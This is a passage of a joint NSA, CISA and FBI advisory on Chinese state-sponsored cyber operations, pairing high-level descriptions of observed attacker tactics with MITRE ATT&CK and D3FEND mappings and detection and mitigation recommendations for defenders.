Leaders](<https://www.cisa.gov/publication/chinese-cyber-threat-overview-and-actions-leaders>) for information on this threat to their organization.\n\n[Click here](<https://media.defense.gov/2021/Jul/19/2002805003/-1/-1/1/CSA_CHINESE_STATE-SPONSORED_CYBER_TTPS.PDF>) for a PDF version of this report.\n\n### Technical Details\n\n#### **Trends in Chinese State-Sponsored Cyber Operations**\n\nNSA, CISA, and FBI have observed increasingly sophisticated Chinese state-sponsored cyber activity targeting U.S. political, economic, military, educational, and CI personnel and organizations. NSA, CISA, and FBI have identified the following trends in Chinese state-sponsored malicious cyber operations through proactive and retrospective analysis:\n\n * **Acquisition of Infrastructure and Capabilities**. Chinese state-sponsored cyber actors remain agile and cognizant of the information security community\u2019s practices. These actors take effort to mask their activities by using a revolving series of virtual private servers (VPSs) and common open-source or commercial penetration tools.\n\n * **Exploitation of Public Vulnerabilities. **Chinese state-sponsored cyber actors consistently scan target networks for critical and high vulnerabilities within days of the vulnerability\u2019s public disclosure. In many cases, these cyber actors seek to exploit vulnerabilities in major applications, such as Pulse Secure, Apache, F5 Big-IP, and Microsoft products. For information on Common Vulnerabilities and Exposures (CVE) known to be exploited by malicious Chinese state-sponsored cyber actors, see:\n\n * CISA-FBI Joint CSA AA20-133A: [Top 10 Routinely Exploited Vulnerabilities](<https://us-cert.cisa.gov/ncas/alerts/aa20-133a>),\n\n * CISA Activity Alert: AA20-275A: [Potential for China Cyber Response to Heightened U.S.-China Tensions](<https://us-cert.cisa.gov/ncas/alerts/aa20-275a>), and\n\n * NSA CSA U/OO/179811-20: [Chinese State-Sponsored Actors Exploit Publicly Known Vulnerabilities](<https://media.defense.gov/2020/Oct/20/2002519884/-1/-1/0/CSA_CHINESE_EXPLOIT_VULNERABILITIES_UOO179811.PDF>).\n\n * **Encrypted Multi-Hop Proxies. **Chinese state-sponsored cyber actors have been routinely observed using a VPS as an encrypted proxy. The cyber actors use the VPS as well as small office and home office (SOHO) devices as operational nodes to evade detection.\n\n#### **Observed Tactics and Techniques**\n\nChinese state-sponsored cyber actors use a full array of tactics and techniques to exploit computer networks of interest worldwide and to acquire sensitive intellectual property, economic, political, and military information. Appendix B: MITRE ATT&CK Framework lists the tactics and techniques used by Chinese state-sponsored cyber actors. A downloadable [JSON file](<https://github.com/nsacyber/chinese-state-sponsored-cyber-operations-observed-ttps>) is also available on the [NSA Cybersecurity GitHub page](<https://github.com/nsacyber>).\n\nRefer to Appendix A: Chinese State-Sponsored Cyber Actors\u2019 Observed Procedures for information on procedures affiliated with these tactics and techniques as well as applicable mitigations.\n\n![](/sites/default/files/Example_of_tactics_and_techniques.png)\n\n_Figure 1: Example of tactics and techniques used in various cyber operations._\n\n### Mitigations\n\nNSA, CISA, and FBI urge federal and SLTT government, CI, DIB, and private industry organizations to apply the following recommendations as well as the detection and mitigation recommendations in Appendix A, which are tailored to observed tactics and techniques:\n\n * **Patch systems and equipment promptly and diligently. **Focus on patching critical and high vulnerabilities that allow for remote code execution or denial-of-service on externally facing equipment and CVEs known to be exploited by Chinese state-sponsored cyber actors. Consider implementing a patch management program that enables a timely and thorough patching cycle. \n**Note: **for more information on CVEs routinely exploited by Chinese state-sponsored cyber actors refer to the resources listed in the Trends in Chinese State-Sponsored Cyber Operations section.\n\n * **Enhance monitoring of network traffic, email, and endpoint systems.** Review network signatures and indicators for focused activities, monitor for new phishing themes, and adjust email rules accordingly. Follow the best practices of restricting attachments via email and blocking URLs and domains based upon reputation. Ensure that log information is aggregated and correlated to enable maximum detection capabilities, with a focus on monitoring for account misuse. Monitor common ports and protocols for command and control (C2) activity. SSL/TLS inspection can be used to see the contents of encrypted sessions to look for network-based indicators of malware communication protocols. Implement and enhance network and endpoint event analysis and detection capabilities to identify initial infections, compromised credentials, and the manipulation of endpoint processes and files.\n * **Use protection capabilities to stop malicious activity. **Implement anti-virus software and other endpoint protection capabilities to automatically detect and prevent malicious files from executing. Use a network intrusion detection and prevention system to identify and prevent commonly employed adversarial malware and limit nefarious data transfers. Use a domain reputation service to detect suspicious or malicious domains. Use strong credentials for service accounts and multi-factor authentication (MFA) for remote access to mitigate an adversary's ability to leverage stolen credentials, but be aware of MFA interception techniques for some MFA implementations.\u25aa\n\n### Resources\n\nRefer to [us-cert.cisa.gov/china](<https://us-cert.cisa.gov/china>), <https://www.ic3.gov/Home/IndustryAlerts>, and [https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/ ](<https://www.nsa.gov/What-We-Do/Cybersecurity/Advisories-Technical-Guidance/>)for previous reporting on Chinese state-sponsored malicious cyber activity.\n\n### Disclaimer of Endorsement\n\nThe information and opinions contained in this document are provided \"as is\" and without any warranties or guarantees. Reference herein to any specific commercial products, process, or service by trade name, trademark, manufacturer, or otherwise, does not constitute or imply its endorsement, recommendation, or favoring by the United States Government, and this guidance shall not be used for advertising or product endorsement purposes.\n\n### Purpose\n\nThis document was developed by NSA, CISA, and FBI in furtherance of their respective cybersecurity missions, including their responsibilities to develop and issue cybersecurity specifications and mitigations. This information may be shared broadly to reach all appropriate stakeholders. \nThis document is marked TLP:WHITE. Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol, see [http://www.us-cert.gov/tlp/.](<http://www.us-cert.gov/tlp/>)\n\n### Trademark Recognition\n\nMITRE and ATT&CK are registered trademarks of The MITRE Corporation. \u2022 D3FEND is a trademark of The MITRE Corporation. \u2022 Microsoft, Microsoft Exchange, Office 365, Microsoft Office, OneDrive, Outlook, OWA, PowerShell, Windows Defender, and Windows are registered trademarks of Microsoft Corporation. \u2022 Pulse Secure is a registered trademark of Pulse Secure, LLC. \u2022 Apache is a registered trademark of Apache Software Foundation. \u2022 F5 and BIG-IP are registered trademarks of F5 Networks. \u2022 Cobalt Strike is a registered trademark of Strategic Cyber LLC. \u2022 GitHub is a registered trademark of GitHub, Inc. \u2022 JavaScript is a registered trademark of Oracle Corporation. \u2022 Python is a registered trademark of Python Software Foundation. \u2022 Unix is a registered trademark of The Open Group. \u2022 Linux is a registered trademark of Linus Torvalds. \u2022 Dropbox is a registered trademark of Dropbox, Inc.\n\n### APPENDIX A: Chinese State-Sponsored Cyber Actors\u2019 Observed Procedures\n\n**Note: **D3FEND techniques are based on the Threat Actor Procedure(s) and may not match automated mappings to ATT&CK techniques and sub-techniques.\n\n### Tactics: _Reconnaissance_ [[TA0043](<https://attack.mitre.org/versions/v9/tactics/TA0043>)] \n\n_Table 1: Chinese state-sponsored cyber actors\u2019 Reconnaissance TTPs with detection and mitigation recommendations_\n\nThreat Actor \nTechnique / Sub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nActive Scanning [[T1595](<https://attack.mitre.org/versions/v9/techniques/T1595>)] \n\n| \n\nChinese state-sponsored cyber actors have been assessed to perform reconnaissance on Microsoft\u00ae 365 (M365), formerly Office\u00ae 365, resources with the intent of further gaining information about the networks. These scans can be automated, through Python\u00ae scripts, to locate certain files, paths, or vulnerabilities. The cyber actors can gain valuable information on the victim network, such as the allocated resources, an organization\u2019s fully qualified domain name, IP address space, and open ports to target or exploit.\n\n| \n\nMinimize the amount and sensitivity of data available to external parties, for example: \n\n * Scrub user email addresses and contact lists from public websites, which can be used for social engineering, \n\n * Share only necessary data and information with third parties, and \n\n * Monitor and limit third-party access to the network. \n\nActive scanning from cyber actors may be identified by monitoring network traffic for sources associated with botnets, adversaries, and known bad IPs based on threat intelligence.\n\n| \n\nDetect: \n\n * Network Traffic Analysis\n\n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n\nIsolate: \n\n * Network Isolation\n\n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nGather Victim Network Information [[T1590](<https://attack.mitre.org/versions/v9/techniques/T1590>)] \n \n### Tactics: _Resource Development_ [[TA0042](<https://attack.mitre.org/versions/v9/tactics/TA0042>)]\n\n_Table II: Chinese state-sponsored cyber actors\u2019 Resource Development TTPs with detection and mitigation recommendations_\n\nThreat Actor \nTechnique / Sub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| Defensive Tactics and Techniques \n---|---|---|--- \n \nAcquire Infrastructure [[T1583](<https://attack.mitre.org/versions/v9/techniques/T1583>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using VPSs from cloud service providers that are physically distributed around the world to host malware and function as C2 nodes.\n\n| \n\nAdversary activities occurring outside the organization\u2019s boundary of control and view makes mitigation difficult. Organizations can monitor for unexpected network traffic and data flows to and from VPSs and correlate other suspicious activity that may indicate an active threat.\n\n| \n\nN/A \n \nStage Capabilities [[T1608](<https://attack.mitre.org/versions/v9/techniques/T1608>)] \n \nObtain Capabilities [[T1588](<https://attack.mitre.org/versions/v9/techniques/T1588>)]: \n\n * Tools [[T1588.002](<https://attack.mitre.org/versions/v9/techniques/T1588/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed using Cobalt Strike\u00ae and tools from GitHub\u00ae on victim networks. \n\n| \n\nOrganizations may be able to identify malicious use of Cobalt Strike by:\n\n * Examining network traffic using Transport Layer Security (TLS) inspection to identify Cobalt Strike. Look for human generated vice machine-generated traffic, which will be more uniformly distributed. \n\n * Looking for the default Cobalt Strike TLS certificate. \n\n * Look at the user agent that generates the TLS traffic for discrepancies that may indicate faked and malicious traffic.\n\n * Review the traffic destination domain, which may be malicious and an indicator of compromise.\n\n * Look at the packet's HTTP host header. If it does not match with the destination domain, it may indicate a fake Cobalt Strike header and profile.\n\n * Check the Uniform Resource Identifier (URI) of the flow to see if it matches one associated with Cobalt Strike's malleable C2 language. If discovered, additional recovery and investigation will be required.\n\n| N/A \n \n### Tactics: _Initial Access_ [[TA0001](<https://attack.mitre.org/versions/v9/tactics/TA0001/>)]\n\n_Table III: Chinese state-sponsored cyber actors\u2019 Initial Access TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDetection and Mitigation Recommendations \n \n---|---|---|--- \n \nDrive By Compromise [[T1189](<https://attack.mitre.org/versions/v9/techniques/T1189>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed gaining access to victim networks through watering hole campaigns of typo-squatted domains.\n\n| \n\n * Ensure all browsers and plugins are kept up to date.\n * Use modern browsers with security features turned on.\n * Restrict the use of unneeded websites, block unneeded downloads/attachments, block unneeded JavaScript\u00ae, restrict browser extensions, etc.\n * Use adblockers to help prevent malicious code served through advertisements from executing. \n * Use script blocking extensions to help prevent the execution of unneeded JavaScript, which may be used during exploitation processes. \n * Use browser sandboxes or remote virtual environments to mitigate browser exploitation.\n * Use security applications that look for behavior used during exploitation, such as Windows Defender\u00ae Exploit Guard (WDEG).\n| \n\nDetect: \n\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]\n * Network Isolation \n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)] \n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \nExploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)]\n\n| \n\nChinese state-sponsored cyber actors have exploited known vulnerabilities in Internet-facing systems.[[1](<https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html%20>)] For information on vulnerabilities known to be exploited by Chinese state-sponsored cyber actors, refer to the Trends in Chinese State-Sponsored Cyber Operations section for a list of resources. \nChinese state-sponsored cyber actors have also been observed:\n\n * Using short-term VPS devices to scan and exploit vulnerable Microsoft Exchange\u00ae Outlook Web Access (OWA\u00ae) and plant webshells.\n\n * Targeting on-premises Identity and Access Management (IdAM) and federation services in hybrid cloud environments to gain access to cloud resources.\n\n * Deploying a public proof of concept (POC) exploit targeting a public-facing appliance vulnerability.\n\n| \n\nReview previously published alerts and advisories from NSA, CISA, and FBI, and diligently patch vulnerable applications known to be exploited by cyber actors. Refer to the Trends in Chinese State-Sponsored Cyber Operations section for a non-inclusive list of resources.\n\nAdditional mitigations include:\n\n * Consider implementing Web Application Firewalls (WAF), which can prevent exploit traffic from reaching an application.\n * Segment externally facing servers and services from the rest of the network with a demilitarized zone (DMZ).\n * Use multi-factor authentication (MFA) with strong factors and require regular re-authentication.\n * Disable protocols using weak authentication.\n * Limit access to and between cloud resources with the desired state being a Zero Trust model. For more information refer to NSA Cybersecurity Information Sheet: [[Embracing a Zero Trust Security Model](<https://media.defense.gov/2021/Feb/25/2002588479/-1/-1/0/CSI_EMBRACING_ZT_SECURITY_MODEL_UOO115131-21.PDF>)].\n * When possible, use cloud-based access controls on cloud resources (e.g., cloud service provider (CSP)-managed authentication between virtual machines).\n * Use automated tools to audit access logs for security concerns.\n * Where possible, enforce MFA for password resets.\n * Do not include Application Programing Interface (API) keys in software version control systems where they can be unintentionally leaked.\n| \n\nHarden:\n\n * Application Hardening [[D3-AH](<https://d3fend.mitre.org/technique/d3f:ApplicationHardening>)]\n * Platform Hardening \n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\nDetect:\n\n * File Analysis [[D3-FA](<https://d3fend.mitre.org/technique/d3f:FileAnalysis>)] \n * Network Traffic Analysis \n * Client-server Payload Profiling [[D3-CSPP](<https://d3fend.mitre.org/technique/d3f:Client-serverPayloadProfiling>)]\n * Process Analysis \n * Process Spawn Analysis\n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)]\n\nIsolate: \n\n * Network Isolation \n * Inbound Traffic Filtering [[D3-ITF](<https://d3fend.mitre.org/technique/d3f:InboundTrafficFiltering>)] \n \nPhishing [[T1566](<https://attack.mitre.org/versions/v9/techniques/T1566>)]: \n\n * Spearphishing Attachment [[T1566.001](<https://attack.mitre.org/versions/v9/techniques/T1566/001>)] \n\n * Spearphishing Link [[T1566.002](<https://attack.mitre.org/versions/v9/techniques/T1566/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed conducting spearphishing campaigns. These email compromise attempts range from generic emails with mass targeted phishing attempts to specifically crafted emails in targeted social engineering lures. \nThese compromise attempts use the cyber actors\u2019 dynamic collection of VPSs, previously compromised accounts, or other infrastructure in order to encourage engagement from the target audience through domain typo-squatting and masquerading. These emails may contain a malicious link or files that will provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment. \n\n| \n\n * Implement a user training program and simulated spearphishing emails to discourage users from visiting malicious websites or opening malicious attachments and re-enforce the appropriate user responses to spearphishing emails. Quarantine suspicious files with antivirus solutions.\n * Use a network intrusion prevention system (IPS) to scan and remove malicious email attachments.\n * Block uncommon file types in emails that are not needed by general users (`.exe`, `.jar`,`.vbs`)\n * Use anti-spoofing and email authentication mechanisms to filter messages based on validity checks of the sender domain (using Sender Policy Framework [SPF]) and integrity of messages (using Domain Keys Identified Mail [DKIM]). Enabling these mechanisms within an organization (through policies such as Domain-based Message Authentication, Reporting, and Conformance [DMARC]) may enable recipients (intra-org and cross domain) to perform similar message filtering and validation.\n * Determine if certain websites that can be used for spearphishing are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.\n * Prevent users from clicking on malicious links by stripping hyperlinks or implementing \"URL defanging\" at the Email Security Gateway or other email security tools.\n * Add external sender banners to emails to alert users that the email came from an external sender.\n| \n\nHarden: \n\n * Message Hardening \n * Message Authentication [[D3-MAN](<https://d3fend.mitre.org/technique/d3f:MessageAuthentication>)]\n * Transfer Agent Authentication [[D3-TAAN](<https://d3fend.mitre.org/technique/d3f:TransferAgentAuthentication>)]\n\nDetect: \n\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * Message Analysis \n * Sender MTA Reputation Analysis [[D3-SMRA](<https://d3fend.mitre.org/technique/d3f:SenderMTAReputationAnalysis>)]\n * Sender Reputation Analysis [[D3-SRA](<https://d3fend.mitre.org/technique/d3f:SenderReputationAnalysis>)] \n \n \nExternal Remote Services [[T1133](<https://attack.mitre.org/versions/v9/techniques/T1133>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Exploiting vulnerable devices immediately after conducting scans for critical zero-day or publicly disclosed vulnerabilities. The cyber actors used or modified public proof of concept code in order to exploit vulnerable systems.\n\n * Targeting Microsoft Exchange offline address book (OAB) virtual directories (VDs).\n\n * Exploiting Internet accessible webservers using webshell small code injections against multiple code languages, including `net`, `asp`, `apsx`, `php`, `japx`, and `cfm`. \n\n**Note:** refer to the references listed above in Exploit Public-Facing Application [[T1190](<https://attack.mitre.org/versions/v9/techniques/T1190>)] for information on CVEs known to be exploited by malicious Chinese cyber actors.\n\n**Note: **this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)].\n\n| \n\n * Many exploits can be mitigated by applying available patches for vulnerabilities (such as CVE-2019-11510, CVE-2019-19781, and CVE-2020-5902) affecting external remote services.\n * Reset credentials after virtual private network (VPN) devices are upgraded and reconnected to the external network.\n * Revoke and generate new VPN server keys and certificates (this may require redistributing VPN connection information to users).\n * Disable Remote Desktop Protocol (RDP) if not required for legitimate business functions.\n * Restrict VPN traffic to and from managed service providers (MSPs) using a dedicated VPN connection.\n * Review and verify all connections between customer systems, service provider systems, and other client enclaves.\n| \n\nHarden:\n\n * Software Update [[D3-SU](<https://d3fend.mitre.org/technique/d3f:SoftwareUpdate>)]\n\nDetect:\n\n * Network Traffic Analysis \n * Connection Attempt Analysis [[D3-CAA](<https://d3fend.mitre.org/technique/d3f:ConnectionAttemptAnalysis>)]\n * Platform Monitoring [[D3-PM](<https://d3fend.mitre.org/technique/d3f:PlatformMonitoring>)]\n * Process Analysis \n * Process Spawn Analysis [[D3-SPA](<https://d3fend.mitre.org/technique/d3f:ProcessSpawnAnalysis>)] \n * Process Lineage Analysis [[D3-PLA](<https://d3fend.mitre.org/technique/d3f:ProcessLineageAnalysis>)] \n \nValid Accounts [[T1078](<https://attack.mitre.org/versions/v9/techniques/T1078>)]:\n\n * Default Accounts [[T1078.001](<https://attack.mitre.org/versions/v9/techniques/T1078/001>)]\n\n * Domain Accounts [[T1078.002](<https://attack.mitre.org/versions/v9/techniques/T1078/002>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed: gaining credential access into victim networks by using legitimate, but compromised credentials to access OWA servers, corporate login portals, and victim networks.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)], Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)], and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Adhere to best practices for password and permission management.\n * Ensure that MSP accounts are not assigned to administrator groups and restrict those accounts to only systems they manage \n * Do not store credentials or sensitive data in plaintext.\n * Change all default usernames and passwords.\n * Routinely update and secure applications using Secure Shell (SSH). \n * Update SSH keys regularly and keep private keys secure.\n * Routinely audit privileged accounts to identify malicious use.\n| \n\nHarden: \n\n * Credential Hardening \n * Multi-factor Authentication [[D3-MFA](<https://d3fend.mitre.org/technique/d3f:Multi-factorAuthentication>)]\n\nDetect:\n\n * User Behavior Analysis [[D3-UBA](<https://d3fend.mitre.org/technique/d3f:UserBehaviorAnalysis>)] \n * Authentication Event Thresholding [[D3-ANET](<https://d3fend.mitre.org/technique/d3f:AuthenticationEventThresholding>)] \n * Job Function Access Pattern Analysis [[D3-JFAPA](<https://d3fend.mitre.org/technique/d3f:JobFunctionAccessPatternAnalysis>)] \n \n### Tactics: _Execution_ [[TA0002](<https://attack.mitre.org/versions/v9/tactics/TA0002>)]\n\n_Table IV: Chinese state-sponsored cyber actors\u2019 Execution TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques\n\n| \n\nThreat Actor Procedure(s)\n\n| \n\nDetection and Mitigation Recommendations\n\n| \n\nDefensive Tactics and Techniques \n \n---|---|---|--- \n \nCommand and Scripting Interpreter [[T1059](<https://attack.mitre.org/versions/v9/techniques/T1059>)]: \n\n * PowerShell\u00ae [[T1059.001](<https://attack.mitre.org/versions/v9/techniques/T1059/001>)]\n\n * Windows\u00ae Command Shell [[T1059.003](<https://attack.mitre.org/versions/v9/techniques/T1059/003>)]\n\n * Unix\u00ae Shell [[T1059.004](<https://attack.mitre.org/versions/v9/techniques/T1059/004>)]\n\n * Python [[T1059.006](<https://attack.mitre.org/versions/v9/techniques/T1059/006>)]\n\n * JavaScript [[T1059.007](<https://attack.mitre.org/versions/v9/techniques/T1059/007>)]\n\n * Network Device CLI [[T1059.008](<https://attack.mitre.org/versions/v9/techniques/T1059/008>)]\n\n| \n\nChinese state-sponsored cyber actors have been observed:\n\n * Using cmd.exe, JavaScript/Jscript Interpreter, and network device command line interpreters (CLI).\n\n * Using PowerShell to conduct reconnaissance, enumeration, and discovery of the victim network. \n\n * Employing Python scripts to exploit vulnerable servers.\n\n * Using a UNIX shell in order to conduct discovery, enumeration, and lateral movement on Linux\u00ae servers in the victim network.\n\n| \n\nPowerShell\n\n * Turn on PowerShell logging. (**Note:** this works better in newer versions of PowerShell. NSA, CISA, and FBI recommend using version 5 or higher.)\n\n * Push Powershell logs into a security information and event management (SIEM) tool.\n\n * Monitor for suspicious behavior and commands. Regularly evaluate and update blocklists and allowlists.\n\n * Use an antivirus program, which may stop malicious code execution that cyber actors attempt to execute via PowerShell.\n\n * Remove PowerShell if it is not necessary for operations. \n\n * Restrict which commands can be used.\n\nWindows Command Shell\n\n * Restrict use to administrator, developer, or power user systems. Consider its use suspicious and investigate, especially if average users run scripts. \n\n * Investigate scripts running out of cycle from patching or other administrator functions if scripts are not commonly used on a system, but enabled. \n\n * Monitor for and investigate other unusual or suspicious scripting behavior. \n\nUnix\n\n * Use application controls to prevent execution.\n\n * Monitor for and investigate unusual scripting behavior. Use of the Unix shell may be common on administrator, developer, or power user systems. In this scenario, normal users running scripts should be considered suspicious. \n\n * If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions should be considered suspicious. \n\nPython\n\n * Audit inventory systems for unauthorized Python installations.\n\n * Blocklist Python where not required.\n\n * Prevent users from installing Python where not required.\n\nJavaScript\n\n * Turn off or restrict access to unneeded scripting components.\n\n * Blocklist scripting where appropriate.\n\n * For malicious code served up through ads, adblockers can help prevent that code from executing.\n\nNetwork Device Command Line Interface (CLI)\n\n * Use TACACS+ to keep control over which commands administrators are permitted to use through the configuration of authentication and command authorization.\n\n * Use an authentication, authorization, and accounting (AAA) systems to limit actions administrators can perform and provide a history of user actions to detect unauthorized use and abuse.\n\n * Ensure least privilege principles are applied to user accounts and groups.\n\n| \n\nHarden: \n\n * Platform Hardening [[D3-PH](<https://d3fend.mitre.org/technique/d3f:PlatformHardening>)]\n\nDetect: \n\n * Process Analysis\n\n * Script Execution Analysis [[D3-SEA](<https://d3fend.mitre.org/technique/d3f:ScriptExecutionAnalysis>)]\n\nIsolate:\n\n * Execution Isolation\n\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nScheduled Task/Job [[T1053](<https://attack.mitre.org/versions/v9/techniques/T1053>)]\n\n * Cron [[T1053.003](<https://attack.mitre.org/versions/v9/techniques/T1053/003>)]\n * Scheduled Task [[T1053.005](<https://attack.mitre.org/versions/v9/techniques/T1053/005>)]\n| \n\nChinese state-sponsored cyber actors have been observed using Cobalt Strike, webshells, or command line interface tools, such as `schtask` or `crontab` to create and schedule tasks that enumerate victim devices and networks.\n\n**Note:** this technique also applies to Persistence [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)] and Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)].\n\n| \n\n\u2022 Monitor scheduled task creation from common utilities using command-line invocation and compare for any changes that do not correlate with known software, patch cycles, or other administrative activity. \n\u2022 Configure event logging for scheduled task creation and monitor process execution from `svchost.exe` (Windows 10) and Windows Task Scheduler (Older version of Windows) to look for changes in `%systemroot%\\System32\\Tasks` that do not correlate with known software, patch cycles, or other administrative activity. Additionally monitor for any scheduled tasks created via command line utilities\u2014such as PowerShell or Windows Management Instrumentation (WMI)\u2014that do not conform to typical administrator or user actions. \n\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring [[D3-OSM](<https://d3fend.mitre.org/technique/d3f:OperatingSystemMonitoring>)] \n * Scheduled Job Analysis [[D3-SJA](<https://d3fend.mitre.org/technique/d3f:ScheduledJobAnalysis>)]\n * System Daemon Monitoring [[D3-SDM](<https://d3fend.mitre.org/technique/d3f:SystemDaemonMonitoring>)]\n * System File Analysis [[D3-SFA](<https://d3fend.mitre.org/technique/d3f:SystemFileAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)] \n \nUser Execution [[T1204](<https://attack.mitre.org/versions/v9/techniques/T1204>)]\n\n * Malicious Link [[T1204.001](<https://attack.mitre.org/versions/v9/techniques/T1204/001>)]\n * Malicious File [[T1204.002](<https://attack.mitre.org/versions/v9/techniques/T1204/002>)]\n| \n\nChinese state-sponsored cyber actors have been observed conducting spearphishing campaigns that encourage engagement from the target audience. These emails may contain a malicious link or file that provide the cyber actor access to the victim\u2019s device after the user clicks on the malicious link or opens the attachment.\n\n| \n\n * Use an antivirus program, which may stop malicious code execution that cyber actors convince users to attempt to execute.\n * Prevent unauthorized execution by disabling macro scripts from Microsoft Office files transmitted via email. Consider using Office Viewer software to open Microsoft Office files transmitted via email instead of full Microsoft Office suite applications.\n * Use a domain reputation service to detect and block suspicious or malicious domains.\n * Determine if certain categories of websites are necessary for business operations and consider blocking access if activity cannot be monitored well or if it poses a significant risk.\n * Ensure all browsers and plugins are kept up to date.\n * Use modern browsers with security features turned on.\n * Use browser and application sandboxes or remote virtual environments to mitigate browser or other application exploitation.\n| \n\nDetect: \n\n * File Analysis \n * Dynamic Analysis [[D3-DA](<https://d3fend.mitre.org/technique/d3f:DynamicAnalysis>)]\n * File Content Rules [[D3-FCR](<https://d3fend.mitre.org/technique/d3f:FileContentRules>)]\n * Identifier Analysis \n * Homoglyph Detection [[D3-HD](<https://d3fend.mitre.org/technique/d3f:HomoglyphDetection>)]\n * URL Analysis [[D3-UA](<https://d3fend.mitre.org/technique/d3f:URLAnalysis>)]\n * Network Traffic Analysis \n * DNS Traffic Analysis [[D3-DNSTA](<https://d3fend.mitre.org/technique/d3f:DNSTrafficAnalysis>)]\n\nIsolate: \n\n * Execution Isolation \n * Hardware-based Process Isolation [[D3-HBPI](<https://d3fend.mitre.org/technique/d3f:Hardware-basedProcessIsolation>)]\n * Executable Allowlisting [[D3-EAL](<https://d3fend.mitre.org/technique/d3f:ExecutableAllowlisting>)]\n * Network Isolation \n * DNS Denylisting [[D3-DNSDL](<https://d3fend.mitre.org/technique/d3f:DNSDenylisting>)]\n * Outbound Traffic Filtering [[D3-OTF](<https://d3fend.mitre.org/technique/d3f:OutboundTrafficFiltering>)] \n \n### Tactics: _Persistence_ [[TA0003](<https://attack.mitre.org/versions/v9/tactics/TA0003>)]\n\n_Table V: Chinese state-sponsored cyber actors\u2019 Persistence TTPs with detection and mitigation recommendations_\n\nThreat Actor Technique / \nSub-Techniques | Threat Actor Procedure(s) | Detection and Mitigation Recommendations | Defensive Tactics and Techniques \n---|---|---|--- \n \nHijack Execution Flow [[T1574](<https://attack.mitre.org/versions/v9/techniques/T1574>)]: \n\n * DLL Search Order Hijacking [[T1574.001](<https://attack.mitre.org/versions/v9/techniques/T1574/001>)]\n| \n\nChinese state-sponsored cyber actors have been observed using benign executables which used Dynamic Link Library (DLL) load-order hijacking to activate the malware installation process. \n\n**Note:** this technique also applies to Privilege Escalation [[TA0004](<https://attack.mitre.org/versions/v9/tactics/TA0004>)] and Defense Evasion [[TA0005](<https://attack.mitre.org/versions/v9/tactics/TA0005>)].\n\n| \n\n * Disallow loading of remote DLLs.\n * Enable safe DLL search mode.\n * Implement tools for detecting search order hijacking opportunities.\n * Use application allowlisting to block unknown DLLs.\n * Monitor the file system for created, moved, and renamed DLLs.\n * Monitor for changes in system DLLs not associated with updates or patches.\n * Monitor DLLs loaded by processes (e.g., legitimate name, but abnormal path).\n| \n\nDetect: \n\n * Platform Monitoring \n * Operating System Monitoring \n * Service Binary Verification [[D3-SBV](<https://d3fend.mitre.org/technique/d3f:ServiceBinaryVerification>)]\n * Process Analysis \n * File Access Pattern Analysis 